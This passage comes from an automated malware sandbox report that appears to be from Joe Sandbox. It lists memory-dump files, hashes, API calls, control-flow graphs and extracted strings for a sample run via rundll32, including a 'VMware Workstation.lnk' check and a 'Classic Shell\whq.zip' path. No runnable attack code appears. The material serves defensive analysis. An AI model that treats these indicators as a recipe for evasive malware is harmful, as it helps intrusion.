                          • Associated: 0000000F.00000002.2902348846.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902399195.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902438985.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902481324.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902531426.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902559635.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902605860.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902643239.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902684882.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902724994.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902774125.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902814789.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902859612.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902903608.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902946994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902985256.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903030581.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903074081.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903120340.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903165539.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903303485.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903347932.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903390990.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903432269.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903480778.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903530188.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                          • String ID:
                          • API String ID: 3216391948-0
                          • Opcode ID: 3b490b7cf56bbf91dd2b89981af10d7b9414ed50fc2553a7ed94af2cd6a02d18
                          • Instruction ID: a21e750fdb81c3cb80ceca5676c95766672ab79d1740a75253142ae5867d54cb
                          • Opcode Fuzzy Hash: 3b490b7cf56bbf91dd2b89981af10d7b9414ed50fc2553a7ed94af2cd6a02d18
                          • Instruction Fuzzy Hash: A321E476210A4089DB20EF76C8917D927A0EB88BDCF50212BFB4E57B69DF38C485C784
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 164 415080-4150c8 call 40ff70 call 411140 FindFirstFileW 169 4150d2-4150ec call 40fde0 164->169 170 4150ca-4150cd FindClose 164->170 170->169
                          APIs
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2901144196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000F.00000002.2901086813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901144196.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901813407.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901855629.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901917379.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901938163.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902013600.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902064071.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902165888.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902229260.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902274083.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902312251.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902348846.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902399195.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902438985.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902481324.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902531426.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902559635.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902605860.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902643239.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902684882.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902724994.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902774125.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902814789.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902859612.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902903608.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902946994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902985256.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903030581.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903074081.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903120340.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903165539.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903303485.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903347932.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903390990.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903432269.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903480778.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903530188.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID:
                          • API String ID: 2295610775-0
                          • Opcode ID: 9164da4fdb7a13e248c7ae70de005f26abc0b9fef4fc521832ab366a37fbd560
                          • Instruction ID: 042890e011036333e5bfd1d3754174ebbb35ecdb7fac3d7a8451519e581d693b
                          • Opcode Fuzzy Hash: 9164da4fdb7a13e248c7ae70de005f26abc0b9fef4fc521832ab366a37fbd560
                          • Instruction Fuzzy Hash: E6F054622019C089CB71AF31C8952ED3710DB467ACF081336A66D4BBE5DE28C595C704
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 0000000F.00000001.1733946216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00401000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_1_401000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6977ca529332a5fcc1d3b161347b54283f90750cbc2a723b4a5fb52c16195291
                          • Instruction ID: eb86fbaa6f94e342d27ac75906ab510fa41879bc408d40cfe529289e6fed6c7a
                          • Opcode Fuzzy Hash: 6977ca529332a5fcc1d3b161347b54283f90750cbc2a723b4a5fb52c16195291
                          • Instruction Fuzzy Hash: DAF06D3001188C4ACBB4FF29D8A9AEC7791EF4A318F44026AA81ED71E1DD285AA88744
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetMessageW.USER32 ref: 00816038
                            • Part of subcall function 00436960: GetFileAttributesW.KERNEL32 ref: 00436979
                          • Sleep.KERNEL32 ref: 00815FC0
                          Strings
                          • C:\Program Files\Classic Shell\whq.zip, xrefs: 00816004
                          • C:\Program Files\Classic Shell, xrefs: 00815F9C, 00815FAE
                          • 78E2EA2D09306A8E4A8449A17700DF32552EBEFB77AC3717BD2C51BE359B53EC181830EB04550D33587B2E0329D21F279182D7E2FDCD044A89361634CAF375101F, xrefs: 00815FF1
                          • \VMware Workstation.lnk, xrefs: 00815F58
                          • C:\Program Files\Classic Shell\cache, xrefs: 00815FC5, 00815FD7
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2901144196.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000F.00000002.2901086813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901144196.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901813407.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901855629.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901917379.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901938163.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902013600.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902064071.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902165888.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902229260.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902274083.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902312251.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902348846.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902399195.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902438985.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902481324.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902531426.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902559635.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902605860.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902643239.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902684882.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902724994.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902774125.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902814789.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902859612.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902903608.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902946994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902985256.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903030581.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903074081.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903120340.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903165539.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903303485.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903347932.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903390990.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903432269.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903480778.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903530188.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: AttributesFileMessageSleep
                          • String ID: 78E2EA2D09306A8E4A8449A17700DF32552EBEFB77AC3717BD2C51BE359B53EC181830EB04550D33587B2E0329D21F279182D7E2FDCD044A89361634CAF375101F$C:\Program Files\Classic Shell$C:\Program Files\Classic Shell\cache$C:\Program Files\Classic Shell\whq.zip$\VMware Workstation.lnk
                          • API String ID: 2390311571-3073936675
                          • Opcode ID: 129142bfb51975e8b592fb8c9b1c301ee2532256d8dbf39388386f8aeb2b2ad8
                          • Instruction ID: 9cd3db94755c139ddff007fdf6a470e84e12c6dbf9b29939154e8315843d076e
                          • Opcode Fuzzy Hash: 129142bfb51975e8b592fb8c9b1c301ee2532256d8dbf39388386f8aeb2b2ad8
                          • Instruction Fuzzy Hash: 79317331200E05D4EB10EF72D8A13D92725FF9479CF805116FA8E976A5EF79C589C394
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • LeaveCriticalSection.KERNEL32 ref: 00414771
                          • EnterCriticalSection.KERNEL32 ref: 00414847
                          • LeaveCriticalSection.KERNEL32 ref: 00414880
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2901144196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000F.00000002.2901086813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901144196.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901813407.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901855629.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901917379.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901938163.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902013600.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902064071.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902165888.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902229260.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902274083.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902312251.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902348846.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902399195.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902438985.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902481324.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902531426.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902559635.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902605860.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902643239.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902684882.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902724994.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902774125.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902814789.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902859612.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902903608.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902946994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902985256.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903030581.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903074081.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903120340.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903165539.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903303485.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903347932.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903390990.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903432269.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903480778.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903530188.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalSection$Leave$Enter
                          • String ID:
                          • API String ID: 2978645861-0
                          • Opcode ID: 81552ea04b8f0d4334cc7bdf6af72e2620360f65341830c32bae4a6db5f01a9f
                          • Instruction ID: 56c173e72efaabb3100106b86f381f207646cefe1b26b91f93a20514a2ca776e
                          • Opcode Fuzzy Hash: 81552ea04b8f0d4334cc7bdf6af72e2620360f65341830c32bae4a6db5f01a9f
                          • Instruction Fuzzy Hash: 39411D65210A5088DB10EF72D4913E92722EB84B9CF85A127FB4E87AA9DF7CC5C5C358
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 113 436960-436983 call 411140 GetFileAttributesW 116 436989-436991 113->116 117 436a4e-436a56 GetLastError 113->117 120 436993-43699d 116->120 121 4369a2-4369a4 116->121 118 436a79-436a7c 117->118 119 436a58-436a5b 117->119 122 436a81-436a8d 118->122 119->118 123 436a5d-436a63 119->123 120->122 124 4369a6-4369db CreateFileW 121->124 125 4369f8-4369fe 121->125 123->118 128 436a65-436a68 123->128 124->122 129 4369e1-4369f3 CloseHandle 124->129 126 436a00-436a03 125->126 127 436a05-436a3a call 420600 125->127 126->122 134 436a49-436a4c 127->134 135 436a3c-436a47 call 420550 127->135 128->118 131 436a6a-436a6d 128->131 129->122 131->118 133 436a6f-436a72 131->133 133->118 136 436a74-436a77 133->136 134->122 135->122 136->118 137 436a7e 136->137 137->122
                          APIs
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2901144196.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000F.00000002.2901086813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901144196.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901813407.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901855629.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901917379.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901938163.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902013600.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902064071.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902165888.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902229260.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902274083.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902312251.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902348846.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902399195.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902438985.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902481324.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902531426.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902559635.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902605860.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902643239.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902684882.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902724994.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902774125.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902814789.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902859612.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902903608.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902946994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902985256.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903030581.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903074081.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903120340.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903165539.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903303485.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903347932.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903390990.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903432269.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903480778.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903530188.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: File$AttributesCloseCreateErrorHandleLast
                          • String ID:
                          • API String ID: 2927643983-0
                          • Opcode ID: 45c71b4b7f66cbdff86984d3ecc73382b56bdf5e258aa0ca66effcb3267f1f5a
                          • Instruction ID: 98a77ccf81b0bcca3246d0e759f0e6111a319c85e2d8d3d3e5bdc5a1946655a4
                          • Opcode Fuzzy Hash: 45c71b4b7f66cbdff86984d3ecc73382b56bdf5e258aa0ca66effcb3267f1f5a
                          • Instruction Fuzzy Hash: BF216832B0821322E630B5A9A46475B1861578F7B8F2AF70FEC695B3D5CA7CCD81178D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000001.1733946216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00401000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_1_401000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID: H
                          • API String ID: 0-2852464175
                          • Opcode ID: 30cc7c901468aa6c039c49a4b99583d2ae127ef8a94102a5ddf9ab6e92f1fcf1
                          • Instruction ID: 1b33353563bd3a9d9c427e1889d884750414c84c03bac5c3f800865a495c2197
                          • Opcode Fuzzy Hash: 30cc7c901468aa6c039c49a4b99583d2ae127ef8a94102a5ddf9ab6e92f1fcf1
                          • Instruction Fuzzy Hash: 8CE1D470518B888FD7A5EF18C058BAAB7E1FB98305F40492EE58DC3261DB7899D4CB46
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetSystemDefaultUILanguage.KERNEL32 ref: 004154B7
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2901144196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
